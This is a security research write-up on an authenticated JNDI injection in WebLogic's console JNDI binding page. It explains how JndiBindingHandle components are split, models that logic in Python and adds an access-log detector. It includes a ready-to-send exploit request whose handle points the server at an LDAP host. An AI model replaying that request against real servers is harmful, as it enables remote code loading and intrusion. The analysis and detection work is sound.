JNDI injection in the WebLogic console; it requires a login.

consolejndi.portal contains a JNDIBindingPageGeneral page for JNDI bindings. The concrete handling logic lives in /PortalConfig/jndi/jndibinding.portlet, and the handler is com.bea.console.actions.jndi.JNDIBindingAction#execute. It performs the lookup directly; the only precondition to pass is serverMBean != null.
In MBeanUtils.getAnyServerMBean(serverName) there is a lookupServer() call made through a dynamic proxy. Following it leads to weblogic.management.jmx.MBeanServerInvocationHandler#invoke, where the method value is lookupServer, which is implemented in weblogic.management.configuration.DomainMBeanImpl#lookupServer. Using the debugger to pull out an existing serverBean and passing its name as serverName satisfies the do-while condition, so the returned serverBean is no longer null; that name is AdminServer.
Now that serverBean is non-null, the next question is whether the address passed to the JNDI lookup is controllable. The lookup value is built as follows:
    // Handle parsed from the JNDIBindingPortlethandle request parameter
    JndiBindingHandle bindingHandle = (JndiBindingHandle)this.getHandleContext(actionForm, request, "JNDIBinding");
    String context = bindingHandle.getContext();     // component 0 of the handle
    String bindName = bindingHandle.getBinding();    // component 1 of the handle
    String serverName = bindingHandle.getServer();   // component 2 of the handle
    String prefix = context;
    String suffix = bindName;
    if (prefix.length() > 0 && suffix.length() > 0) {
        prefix = prefix + ".";                       // context and binding are joined with '.'
    }
    Object boundObj = c.lookup(prefix + suffix);     // the JNDI lookup itself
The prefix, the suffix and serverName are all obtained from bindingHandle, an instance of JndiBindingHandle. Following bindingHandle.getContext(): it calls the class's own getComponent method.
    protected String getComponent(int index) {
        return this.getComponents()[index];
    }

    private String[] getComponents() {
        if (this.components == null) {
            // The serialized identifier is the string inside JndiBindingHandle("...")
            String serialized = this.getObjectIdentifier();
            ArrayList componentList = new ArrayList();
            StringBuffer currentComponent = new StringBuffer();
            boolean lastWasSpecial = false;

            for(int i = 0; i < serialized.length(); ++i) {
                char c = serialized.charAt(i);
                if (lastWasSpecial) {
                    // Character following a backslash: '0' = null component, '\\' and ';' are literals
                    if (c == '0') {
                        if (currentComponent == null) {
                            throw new AssertionError("Handle component already null : '" + serialized + '"');
                        }

                        if (currentComponent.length() > 0) {
                            throw new AssertionError("Null handle component preceeded by a character : '" + serialized + "'");
                        }

                        currentComponent = null;
                    } else if (c == '\\') {
                        if (currentComponent == null) {
                            throw new AssertionError("Null handle followed by \\ : '" + serialized + "'");
                        }

                        currentComponent.append('\\');
                    } else {
                        if (c != ';') {
                            throw new AssertionError("\\ in handle followed by a character :'" + serialized + "'");
                        }

                        if (currentComponent == null) {
                            throw new AssertionError("Null handle followed by ; : '" + serialized + "'");
                        }

                        currentComponent.append(';');
                    }

                    lastWasSpecial = false;
                } else if (c == '\\') {
                    if (currentComponent == null) {
                        throw new AssertionError("Null handle followed by \\ : '" + serialized + "'");
                    }

                    lastWasSpecial = true;
                } else if (c == ';') {
                    // An unescaped ';' terminates the current component
                    String component = currentComponent != null ? currentComponent.toString() : null;
                    componentList.add(component);
                    currentComponent = new StringBuffer();
                } else {
                    if (currentComponent == null) {
                        throw new AssertionError("Null handle followed by a character : '" + serialized + "'");
                    }

                    currentComponent.append(c);
                }
            }

            if (lastWasSpecial) {
                throw new AssertionError("Last character in handle is \\ :'" + serialized + "'");
            }

            String component = currentComponent != null ? currentComponent.toString() : null;
            componentList.add(component);
            this.components = (String[])((String[])componentList.toArray(new String[componentList.size()]));
        }

        return this.components;
    }
The whole routine simply splits the identifier on ';', so every component (context, binding name and server name) is attacker-controlled, which results in JNDI injection. Because execute() joins the context and binding name with a '.', a handle whose first two components are the halves of a host address is reassembled into a complete remote JNDI URL.
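To make the two pieces of logic above concrete, here is a Python model of them: how JndiBindingHandle.getComponents() splits the serialized handle on unescaped ';' (including the '\;', '\\' and '\0' escapes), and how JNDIBindingAction.execute() glues the first two components back together with '.' to form the name handed to Context.lookup(). This is an added teaching aid written for this write-up, not WebLogic's own code; the sample handles are constructed, apart from the one taken from the request at the end of the write-up.

```python
"""Python model of the two pieces of console code shown above: how
JndiBindingHandle.getComponents() splits the serialized handle on
unescaped ';', and how JNDIBindingAction.execute() glues the first two
components back together with '.' to form the name passed to
Context.lookup().  Added for this write-up as a teaching aid; it is not
WebLogic's code, and the sample handles below are constructed."""
from typing import List, Optional, Tuple


def split_handle_components(serialized: str) -> List[Optional[str]]:
    """Split a handle identifier into components, mirroring the decompiled
    getComponents(): an unescaped ';' ends a component, '\\;' and '\\\\'
    are literal characters, '\\0' marks a null component, and any other
    character after a backslash is rejected (the Java code throws
    AssertionError; ValueError is used here)."""
    components: List[Optional[str]] = []
    current: Optional[List[str]] = []
    last_was_special = False

    for c in serialized:
        if last_was_special:
            if c == '0':
                if current is None:
                    raise ValueError("Handle component already null")
                if current:
                    raise ValueError("Null handle component preceded by a character")
                current = None
            elif c == '\\':
                if current is None:
                    raise ValueError("Null handle followed by \\")
                current.append('\\')
            elif c == ';':
                if current is None:
                    raise ValueError("Null handle followed by ;")
                current.append(';')
            else:
                raise ValueError("\\ in handle followed by a character")
            last_was_special = False
        elif c == '\\':
            if current is None:
                raise ValueError("Null handle followed by \\")
            last_was_special = True
        elif c == ';':
            # Unescaped ';' closes the current component
            components.append(''.join(current) if current is not None else None)
            current = []
        else:
            if current is None:
                raise ValueError("Null handle followed by a character")
            current.append(c)

    if last_was_special:
        raise ValueError("Last character in handle is \\")
    components.append(''.join(current) if current is not None else None)
    return components


def rebuild_lookup_name(serialized: str) -> Tuple[str, str]:
    """Return (lookup_name, server_name) as JNDIBindingAction builds them:
    component 0 is the context, 1 the binding name, 2 the server.  The two
    strings are joined with '.' when both are non-empty, which is why a
    handle whose first two components are the halves of a host address
    yields a complete remote URL."""
    parts = split_handle_components(serialized)
    context, bind_name, server_name = parts[0], parts[1], parts[2]
    if context is None or bind_name is None or server_name is None:
        raise ValueError("null component (the Java code would raise NullPointerException)")
    prefix, suffix = context, bind_name
    if len(prefix) > 0 and len(suffix) > 0:
        prefix = prefix + '.'
    return prefix + suffix, server_name


if __name__ == '__main__':
    # Constructed: a normal console handle, and the handle from the request
    # shown at the end of this write-up
    for handle in ("jdbc;MyDataSource;AdminServer",
                   "ldap://172.16.0;1:1389/aew0xy;AdminServer"):
        name, server = rebuild_lookup_name(handle)
        print(f"{handle!r:50} -> lookup {name!r} on {server}")
```

Running it shows the difference between a legitimate handle, which resolves to a dotted JNDI name such as jdbc.MyDataSource, and one whose components reassemble into an LDAP URL; the server name component only has to match an existing server so that the serverMBean check passes.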
Finally, summarizing the overall conditions: an authenticated console session, an existing server name (AdminServer), and a JNDI address whose parts are separated by ';' inside the handle:

    GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://172.16.0;1:1389/aew0xy;AdminServer%22) HTTP/1.1
    Host: 172.16.1.134:7001
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.16.1.134:7001/console/login/LoginForm.jsp
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: ADMINCONSOLESESSION=8Xk3Y9pCjDLlUARpWoE3rhia67n0LKY5xuTzTHfWxz1ITlNDOob1!1254895310
    Connection: close
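From the defender's side, the request above has a clear shape in web-server access logs: a hit on /console/consolejndi.portal whose JNDIBindingPortlethandle parameter carries a URL scheme, something a legitimate binding handle (a dotted JNDI name such as jdbc;MyDataSource;AdminServer) never contains. The following detection example was added for this write-up and is not part of the original post; the access-log lines are constructed samples, the scheme list is an assumption, and only the portal path, parameter name and handle value are taken from the request shown above.

```python
"""Added detection example for this write-up (constructed, not from the
original post): scan web-server access-log lines for requests to the
console's JNDI binding portlet whose JndiBindingHandle carries a remote
JNDI URL scheme.  Log lines are constructed samples."""
import re
from urllib.parse import unquote
from typing import Dict, List

# Assumed list of JNDI URL schemes that make the server reach out to a remote host
REMOTE_JNDI_SCHEME_RE = re.compile(r'\b(?:ldaps?|rmi|iiop|dns)://', re.IGNORECASE)

# Request-line shape of the vulnerable page; the portal path comes from the
# request shown in the write-up
REQUEST_RE = re.compile(r'"(?:GET|POST) (/console/consolejndi\.portal\?[^ "]*) HTTP/')

# Constructed combined-format access log: one benign binding lookup, one
# lookup whose handle embeds an LDAP URL, one unrelated request
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22jdbc;MyDataSource;AdminServer%22) HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2021:10:00:03 +0000] "GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://172.16.0;1:1389/aew0xy;AdminServer%22) HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2021:10:00:05 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 2048
"""


def query_params(url: str) -> Dict[str, str]:
    """Split a request path's query string on '&' only.  Done by hand rather
    than with urllib.parse.parse_qs because older Python versions also split
    parse_qs on ';', which would destroy the handle's components."""
    params: Dict[str, str] = {}
    _, _, query = url.partition('?')
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params[unquote(key)] = unquote(value)
    return params


def extract_handle(request_path: str) -> str:
    """Return the percent-decoded JNDIBindingPortlethandle value, or '' if absent."""
    return query_params(request_path).get('JNDIBindingPortlethandle', '')


def find_suspicious_jndi_requests(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per log line whose JNDI binding handle embeds a
    remote JNDI URL scheme."""
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        handle = extract_handle(m.group(1))
        scheme = REMOTE_JNDI_SCHEME_RE.search(handle)
        if scheme:
            findings.append({
                'client': line.split(' ', 1)[0],
                'scheme': scheme.group(0).lower(),
                'handle': handle,
            })
    return findings


if __name__ == '__main__':
    for f in find_suspicious_jndi_requests(SAMPLE_LOG):
        print(f"{f['client']} requested a JNDI lookup via {f['scheme']}: {f['handle']}")
```

The check keys on the scheme rather than trying to rebuild the lookup name, so it is cheap to run over large logs; the same heuristic can be applied at a reverse proxy in front of the console. Because the page needs an authenticated session, a match also identifies which console account was used, which is the more important follow-up question for incident response.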
My writing is poor, the wording flippant, the content shallow and the hands-on work clumsy. Corrections and guidance from the masters are welcome and much appreciated.